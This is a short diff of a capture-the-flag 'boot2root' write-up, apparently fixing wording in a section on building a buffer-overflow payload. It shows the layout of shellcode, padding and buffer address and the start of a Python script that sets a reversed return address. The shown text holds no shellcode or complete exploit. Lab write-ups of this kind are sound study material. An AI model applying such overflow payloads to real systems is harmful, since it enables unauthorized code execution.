dbelpaum/boot2root/writeup1.md

 SHELLCODE + PADDING + ADDRESS OF THE BUFFER
 ```

-This script contains generates our payload which will be stored in a `payload` file :
+This script generates our payload which will be stored in a `payload` file :

 ```py
 addr = b"\xbf\xff\xf8\x98"[::-1]